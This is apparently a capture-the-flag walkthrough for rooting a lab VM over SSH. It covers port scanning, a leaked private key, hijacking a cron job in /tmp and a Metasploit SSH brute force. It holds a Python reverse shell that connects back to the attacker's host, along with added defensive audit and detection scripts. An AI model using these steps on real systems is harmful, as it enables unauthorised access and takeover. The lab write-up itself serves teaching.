Tools:
Kali Linux
Target: penetrate the machine to root over SSH
Steps:
Introduction to the SSH protocol
SSH is short for Secure Shell and is specified by the IETF Network Working Group; it is a security protocol built on top of the application layer.
SSH is currently one of the more reliable protocols, designed specifically to provide security for remote login sessions and other network services. Using SSH effectively prevents information leakage during remote administration.
SSH started as a program on UNIX systems and was quickly ported to other operating systems. When used correctly, SSH covers weaknesses in the network. SSH clients exist for many platforms; almost every UNIX platform, including HP-UX, Linux, AIX, Solaris, Digital UNIX, Irix and others, can run SSH. The service runs on TCP port 22.
SSH authentication mechanisms
Password-based authentication
As long as you know your account name and password, you can log in to the remote host. All transmitted data is encrypted, but there is no guarantee that the server you are connecting to is the one you intended to reach. Another server may impersonate the real one, which is a "man-in-the-middle" attack.
Key-based authentication
This relies on a key pair: you must generate one for yourself and place the public key on the server you need to access. When you connect to the SSH server, the client software sends the server a request asking to be authenticated with your private key. On receiving the request, the server first looks for your public key in your home directory on that server, then checks it against the private key you presented. If the two keys match, authentication succeeds and you are logged in to the server.
In CTFs the private key is usually id_rsa and the public key id_rsa.pub.
Weaknesses of the SSH authentication mechanisms
Password-based authentication
Dictionary-based brute forcing cracks a username and its password; connecting to the remote host's SSH service with an SSH client then gives a degree of control over the server (not necessarily root).
Key-based authentication
Collecting information about the host yields a leaked username and its matching private key, then:
chmod 600 id_rsa
ssh -i id_rsa usr@ip_address to log in to the server (not necessarily root).
Step 1: discover the target IP
netdiscover -r 192.168.2.1/24
Result shown in the figure:
Step 2: information gathering
Given the target machine's IP address, the first thing to consider when testing it is which services it exposes.
Detect the target's open services and their versions:
nmap -sV ip_address
Detect all information about the target:
nmap -A -v ip_address
Detect the target's operating system type and version:
nmap -O ip_address
Results:
root@kali:~# nmap -sV 192.168.2.102
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-14 05:33 EDT
Nmap scan report for debian.lan (192.168.2.102)
Host is up (0.0018s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
MAC Address: 08:00:27:BB:7B:CE (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.03 seconds
root@kali:~# nmap -A -v 192.168.2.102
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-14 05:36 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 05:36
Completed NSE at 05:36, 0.00s elapsed
Initiating NSE at 05:36
Completed NSE at 05:36, 0.00s elapsed
Initiating ARP Ping Scan at 05:36
Scanning 192.168.2.102 [1 port]
Completed ARP Ping Scan at 05:36, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:36
Completed Parallel DNS resolution of 1 host. at 05:36, 0.00s elapsed
Initiating SYN Stealth Scan at 05:36
Scanning debian.lan (192.168.2.102) [1000 ports]
Discovered open port 111/tcp on 192.168.2.102
Discovered open port 22/tcp on 192.168.2.102
Discovered open port 80/tcp on 192.168.2.102
Completed SYN Stealth Scan at 05:36, 0.28s elapsed (1000 total ports)
Initiating Service scan at 05:36
Scanning 3 services on debian.lan (192.168.2.102)
Completed Service scan at 05:36, 6.11s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against debian.lan (192.168.2.102)
NSE: Script scanning 192.168.2.102.
Initiating NSE at 05:36
Completed NSE at 05:36, 0.72s elapsed
Initiating NSE at 05:36
Completed NSE at 05:36, 0.01s elapsed
Nmap scan report for debian.lan (192.168.2.102)
Host is up (0.0013s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
| 2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
| 256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|_ 256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries
|_/wordpress-blog /files
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Secretsec Company
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 43295/udp status
|_ 100024 1 45779/tcp status
MAC Address: 08:00:27:BB:7B:CE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.050 days (since Wed Aug 14 04:24:11 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.26 ms debian.lan (192.168.2.102)
NSE: Script Post-scanning.
Initiating NSE at 05:36
Completed NSE at 05:36, 0.00s elapsed
Initiating NSE at 05:36
Completed NSE at 05:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.28 seconds
Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB)
root@kali:~# nmap -O 192.168.2.102
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-14 05:37 EDT
Nmap scan report for debian.lan (192.168.2.102)
Host is up (0.0019s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
MAC Address: 08:00:27:BB:7B:CE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.54 seconds
Analysing the scan results
For a target with the SSH service on port 22
Consider first:
1. Brute forcing
2. Private key leakage (does the private key have a passphrase, and can the username that owns it be found)
For a target with an HTTP service on port 80 or another port
Consider first:
1. Visit the target's HTTP service in a browser, e.g. http://ip_address:port
2. Use a scanner to enumerate the HTTP directories, e.g. dirb http://ip_address:port/
Pay particular attention to unusual ports (ports above 1024).
Digging for sensitive information
Browse the target IP's HTTP service and pay attention to what the pages show, especially contact details and similar (they may well be SSH usernames). Browse recursively, and try to visit every directory page that dirb finds;
in particular visit robots.txt and certain directories to dig up information worth exploiting. For a target running SSH, be sure to check whether an SSH private key (id_rsa) can be found;
on some targets the nikto scanner can also be used to dig for sensitive information:
nikto -host ip_address
Pay particular attention to sensitive files such as config files, and read the scan results carefully to dig out usable sensitive information;
Open Firefox and enter the ip_address. Result shown in the figure:
We find that this is the index page of a security company, and while browsing it we discovered some sensitive information:
We can guess that these three people are users on the target machine.
Next we use dirb to enumerate directories.
Results below (too long, so only the most useful part is shown):
root@kali:~# dirb http://192.168.2.102/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Aug 14 06:01:40 2019
URL_BASE: http://192.168.2.102/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.2.102/ ----
==> DIRECTORY: http://192.168.2.102/files/
==> DIRECTORY: http://192.168.2.102/icons/
+ http://192.168.2.102/index.html (CODE:200|SIZE:5651)
==> DIRECTORY: http://192.168.2.102/manual/
+ http://192.168.2.102/robots.txt (CODE:200|SIZE:57)
+ http://192.168.2.102/server-status (CODE:403|SIZE:301)
---- Entering directory: http://192.168.2.102/files/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.2.102/icons/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.2.102/manual/ ----
==> DIRECTORY: http://192.168.2.102/manual/da/
==> DIRECTORY: http://192.168.2.102/manual/de/
==> DIRECTORY: http://192.168.2.102/manual/en/
==> DIRECTORY: http://192.168.2.102/manual/es/
==> DIRECTORY: http://192.168.2.102/manual/fr/
==> DIRECTORY: http://192.168.2.102/manual/images/
+ http://192.168.2.102/manual/index.html (CODE:200|SIZE:626)
==> DIRECTORY: http://192.168.2.102/manual/ja/
==> DIRECTORY: http://192.168.2.102/manual/ko/
==> DIRECTORY: http://192.168.2.102/manual/style/
==> DIRECTORY: http://192.168.2.102/manual/tr/
==> DIRECTORY: http://192.168.2.102/manual/zh-cn/
---- Entering directory: http://192.168.2.102/manual/da/ ----
==> DIRECTORY: http://192.168.2.102/manual/da/developer/
==> DIRECTORY: http://192.168.2.102/manual/da/faq/
==> DIRECTORY: http://192.168.2.102/manual/da/howto/
... ...
We can also scan with nikto:
root@kali:~/Desktop# nikto -host 192.168.2.102
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.2.102
+ Target Hostname: 192.168.2.102
+ Target Port: 80
+ Start Time: 2019-08-14 06:17:34 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/wordpress-blog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /files/: Directory indexing found.
+ Entry '/files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Server may leak inodes via ETags, header found with file /, inode: 1613, size: 5517867aefd40, mtime: gzip
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7917 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2019-08-14 06:18:14 (GMT-4) (40 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
nikto can detect sensitive file names and is fairly powerful.
First we look at robots.txt for useful information.
We find two subdirectories; let's see what is in them.
(Ugh...)
We did not find anything relevant there, so I looked at other links.
In icons we found a pleasant surprise: a txt file. Open it.
We found a private key. Download it to the desktop and rename it at the same time:
root@kali:~# cd Desktop
root@kali:~/Desktop# wget "http://192.168.2.102/icons/VDSoyuAXiO.txt"
--2019-08-14 06:16:04-- http://192.168.2.102/icons/VDSoyuAXiO.txt
Connecting to 192.168.2.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1677 (1.6K) [text/plain]
Saving to: ‘VDSoyuAXiO.txt’
VDSoyuAXiO.txt 100%[==================>] 1.64K --.-KB/s in 0s
2019-08-14 06:16:04 (34.3 MB/s) - ‘VDSoyuAXiO.txt’ saved [1677/1677]
root@kali:~/Desktop# mv VDSoyuAXiO.txt id_rsa
After renaming, we set the permissions on id_rsa (chmod 600 id_rsa, as above).
Then we start the SSH connection.
Note: if id_rsa has no passphrase it can be used directly, but if it does, the passphrase must be cracked first.
root@kali:~/Desktop# ssh -i id_rsa martin@192.168.2.102
We are in the target machine.
We find three usernames, matching the information on the website.
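The first thing to establish about a key file like the one found above is whether it is passphrase-protected at all, since an unprotected key is a ready-to-use credential. The following is an added example written for this write-up, not the author's code; the key bodies in it are constructed stand-ins and contain no real key material.

```python
"""Check whether a found SSH private key is passphrase-protected.
Added example for this write-up, not the author's code; the key bodies below
are constructed stand-ins and contain no real key material."""
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"

def _openssh_cipher(b64_body):
    """Decode an openssh-key-v1 blob and return its cipher name ('none' = unprotected)."""
    raw = base64.b64decode(b64_body)
    if not raw.startswith(OPENSSH_MAGIC):
        raise ValueError("not an openssh-key-v1 blob")
    off = len(OPENSSH_MAGIC)
    (n,) = struct.unpack(">I", raw[off:off + 4])  # cipher name is length-prefixed
    return raw[off + 4:off + 4 + n].decode()

def key_is_encrypted(pem_text):
    """True if the key needs a passphrase, False if it can be used as-is."""
    lines = [ln.strip() for ln in pem_text.strip().splitlines()]
    header, body = lines[0], lines[1:-1]
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        return _openssh_cipher("".join(body)) != "none"
    if header.startswith("-----BEGIN") and header.endswith("PRIVATE KEY-----"):
        # Legacy PEM (RSA/DSA/EC): encryption is announced by a Proc-Type header
        return any(ln.startswith("Proc-Type:") and "ENCRYPTED" in ln for ln in body)
    raise ValueError("not a private key file")

def constructed_openssh_key(cipher):
    """Constructed blob with only the magic and cipher field, enough for the check."""
    blob = OPENSSH_MAGIC + struct.pack(">I", len(cipher)) + cipher.encode()
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob).decode()
            + "\n-----END OPENSSH PRIVATE KEY-----\n")

# Constructed legacy PEM samples (body is just base64 of the word 'constructed').
PLAIN_PEM = "-----BEGIN RSA PRIVATE KEY-----\nY29uc3RydWN0ZWQ=\n-----END RSA PRIVATE KEY-----\n"
ENCRYPTED_PEM = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                 "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
                 "Y29uc3RydWN0ZWQ=\n-----END RSA PRIVATE KEY-----\n")

if __name__ == "__main__":
    for name, key in [("plain PEM", PLAIN_PEM), ("encrypted PEM", ENCRYPTED_PEM),
                      ("openssh none", constructed_openssh_key("none")),
                      ("openssh aes256-ctr", constructed_openssh_key("aes256-ctr"))]:
        print(name, "-> needs passphrase:", key_is_encrypted(key))
```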
Expanding the foothold
After logging in to the server, we need to do the following.
1. Check the current user: whoami
2. id to check the current user's privileges
3. Look at the root directory and search for the flag
If we have root, the target has been fully taken. If not, privilege escalation is certainly needed. Usually the flag file belongs only to root and the corresponding group;
cat /etc/passwd //list all users
cat /etc/group //list the groups
find / -user username //find files owned by a given user
/tmp //check the temporary file directory
Digging deeper
The /etc/crontab file defines the tasks the system runs periodically; editing it requires root. Different users can each have their own scheduled tasks.
cat /etc/crontab to find out whether other users have scheduled tasks, and check what those tasks do. The task being run necessarily corresponds to some file on the target machine.
If /etc/crontab schedules a file for some user but that file does not exist in the given directory, you can create a reverse shell yourself and listen with netcat to obtain that user's privileges.
If the scheduled file exists, change to its directory and check its permissions to see whether the current user has read/write access.
martin@debian:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * jimmy python /tmp/sekurity.py
In the crontab we find that jimmy has a sekurity.py file in /tmp.
Now we look at the /tmp directory.
We find there is no sekurity.py file, so we can create a reverse shell.
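From the defender's side, the weak point here is a cron entry that runs a file in a world-writable directory, or one that does not exist yet. The following audit is an added example for this write-up, not the author's code; the crontab text is constructed from the entries shown above, and the `exists` check is injectable so the sample runs without touching the local disk.

```python
"""Audit a system crontab (/etc/crontab layout, with a user field) for jobs whose
command points at a file a non-owner could control. Added example for this
write-up, not the author's code; the crontab text is constructed from the post."""
import os
import re
import shlex

# Directories where any local user can create the file the job will then run.
WORLD_WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "perl", "ruby"}

CRONTAB_SAMPLE = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * jimmy python /tmp/sekurity.py
"""

def parse_system_crontab(text):
    """Yield (user, command) per job line; skips comments and VAR=value lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        fields = line.split(None, 6)  # five time fields, user, command
        if len(fields) == 7:
            yield fields[5], fields[6]

def script_path(command):
    """Return the file the job executes: the interpreter's argument, else the command itself."""
    words = shlex.split(command.split("&&")[0])
    if not words:
        return None
    if os.path.basename(words[0]) in INTERPRETERS and len(words) > 1:
        return words[1]
    return words[0]

def audit_crontab(text, exists=os.path.exists):
    """Return [(user, path, reasons)] for jobs that run from a world-writable
    directory or point at a missing file. `exists` is injectable for offline use."""
    findings = []
    for user, command in parse_system_crontab(text):
        path = script_path(command)
        if not path or not path.startswith("/"):
            continue
        reasons = []
        if any(path.startswith(d + "/") for d in WORLD_WRITABLE_DIRS):
            reasons.append("runs from a world-writable directory")
        if not exists(path):
            reasons.append("target file is missing, so any user could create it")
        if reasons:
            findings.append((user, path, reasons))
    return findings
```

Running `audit_crontab(CRONTAB_SAMPLE, exists=lambda p: p.startswith("/etc"))` reproduces what the post observed: the jimmy job is flagged on both counts, the root job is not.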
We now create a file 1.py on Kali and write the following program into it:
#!/usr/bin/python
import os, subprocess, socket
s=socket.socket()
s.connect(("192.168.2.165",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
Program analysis:
os.dup2(fd, fd2)
The os.dup2() method duplicates one file descriptor fd onto another, fd2.
fileno() returns the file descriptor.
If the program only has os.dup2(s.fileno(),0), then it only creates a shell on the target, and after the connection is dropped you return directly to Kali.
If it has os.dup2(s.fileno(),0) and os.dup2(s.fileno(),1), it still only creates a shell on the target, but after the connection drops it stays on the target.
With
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
a reverse shell is created.
With the reverse shell written, we copy the source into a new sekurity.py in the target's /tmp directory and make it executable.
Once that is done, we start listening on the port in Kali.
Command to check port usage:
netstat -pantu
The crontab file schedules jobs; from it we see that jimmy's sekurity.py runs automatically every 5 minutes. So we just wait patiently for 5 minutes and jimmy will create the reverse shell.
If we ran python /tmp/sekurity.py directly, it would run as martin instead.
After 5 minutes we see that we are in the shell; now we check the current user.
It is jimmy.
Digging deeper
Goal: find a way to root the target machine
su - root
Check the user: whoami
Check its privileges: id
Change to /home/username and check for files that could help escalate to root;
Next we look at the files in the user's home directory.
Look at the networker file.
We find the file is of no value, so we turn to the hadi user.
Last resort
When there is no other way, the only option is to brute-force the SSH service to crack the last username. Tools include hydra, medusa and others;
this time we use cupp to build a wordlist.
Building a wordlist with cupp
apt-get install cupp
Tutorial on the social-engineering wordlist generators Cupp and Cewl under Kali Linux
Create the password wordlist:
root@kali:~/Desktop/common-password# cupp -i
[+] Insert the informations about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> First Name: hadi
> Surname:
> Nickname:
> Birthdate (DDMMYYYY):
> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):
> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):
> Pet's name:
> Company name:
> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:y
> Leet mode? (i.e. leet = 1337) Y/[N]:
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to hadi.txt, counting 432 words.
[+] Now load your pistolero with hadi.txt and shoot! Good luck!
hadi.txt is created automatically.
Cracking SSH with Metasploit
Type msfconsole in the terminal.
Inside Metasploit we use the ssh_login module for the attack.
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf5 auxiliary(scanner/ssh/ssh_login) >
We fill in all the options marked yes:
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.2.102
rhosts => 192.168.2.102
msf5 auxiliary(scanner/ssh/ssh_login) > set threads 5
threads => 5
msf5 auxiliary(scanner/ssh/ssh_login) > set username hadi
username => hadi
msf5 auxiliary(scanner/ssh/ssh_login) > set verbose true
verbose => true
msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /root/Desktop/hadi.txt
pass_file => /root/Desktop/hadi.txt
msf5 auxiliary(scanner/ssh/ssh_login) > show options
Now we check the settings again:
msf5 auxiliary(scanner/ssh/ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /root/Desktop/hadi.txt no File containing passwords, one per line
RHOSTS 192.168.2.102 yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 5 yes The number of concurrent threads
USERNAME hadi no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
Note: with VERBOSE set to true, progress can be watched in real time.
We run it and let the module do the work.
msf5 auxiliary(scanner/ssh/ssh_login) > run
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi10'
[!] No active DB -- Credential data will not be saved!
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi11'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi12'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi13'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi14'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi15'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi16'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi17'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi18'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi19'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi20'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi2008'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi2009'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi2010'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi2011'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi2012'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi2013'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi2014'
[-] 192.168.2.102:22 - Failed: 'hadi:Hadi2015'
... ...
(This time cupp could not produce the password, so brute forcing is not easy.)
The password is hadi123.
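On the target, a run like this leaves a burst of "Failed password" lines in sshd's log, which is what a defender should be alerting on. The following detection is an added example, not from the original post; the auth.log lines are constructed to mimic Debian's syslog format, with the attacking address taken from the post's Kali machine.

```python
"""Flag SSH password-guessing bursts in sshd auth log lines, the trace a run
like the ssh_login module above leaves on the target. Added example, not from
the post; the log lines are constructed to mimic Debian's /var/log/auth.log."""
import re
from collections import defaultdict
from datetime import datetime

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>[\d.]+) port \d+ ssh2$"
)

SAMPLE_LOG = """\
Aug 14 06:40:01 debian sshd[2301]: Failed password for hadi from 192.168.2.165 port 51022 ssh2
Aug 14 06:40:02 debian sshd[2303]: Failed password for hadi from 192.168.2.165 port 51024 ssh2
Aug 14 06:40:02 debian sshd[2305]: Failed password for hadi from 192.168.2.165 port 51026 ssh2
Aug 14 06:40:03 debian sshd[2307]: Failed password for hadi from 192.168.2.165 port 51028 ssh2
Aug 14 06:40:03 debian sshd[2309]: Failed password for hadi from 192.168.2.165 port 51030 ssh2
Aug 14 06:40:04 debian sshd[2311]: Accepted password for hadi from 192.168.2.165 port 51032 ssh2
Aug 14 06:52:10 debian sshd[2400]: Failed password for martin from 192.168.2.50 port 40001 ssh2
"""

def parse_failures(log_text, year=2019):
    """Return (timestamp, user, src) per failed-password line; syslog omits the year."""
    out = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            out.append((ts, m["user"], m["src"]))
    return out

def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Sliding window per source IP: alert when >= threshold failures fall within
    window_s seconds. Returns {src: (failures_in_window, sorted usernames tried)}."""
    by_src = defaultdict(list)
    for ts, user, src in parse_failures(log_text):
        by_src[src].append((ts, user))
    alerts = {}
    for src, events in by_src.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while (events[end][0] - events[start][0]).total_seconds() > window_s:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[src] = (count, sorted({u for _, u in events[start:end + 1]}))
    return alerts
```

An "Accepted password" from a source that has just tripped this alert, as in the sample's sixth line, is the outcome the post reaches and is worth a separate, higher-severity rule.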
We see that session 1 has been established.
Now we enter the session.
Improving the shell
We notice it is different from our usual terminal.
We use the following command:
python -c "import pty; pty.spawn('/bin/bash')"
Result:
We now have the terminal we wanted.
Next we try privilege escalation.
Enter the password hadi123 to try.
Root obtained.
Look at the /root directory:
root@debian:/home/hadi# cd /root
cd /root
root@debian:~# ls
ls
flag.txt
root@debian:~#
Flag found.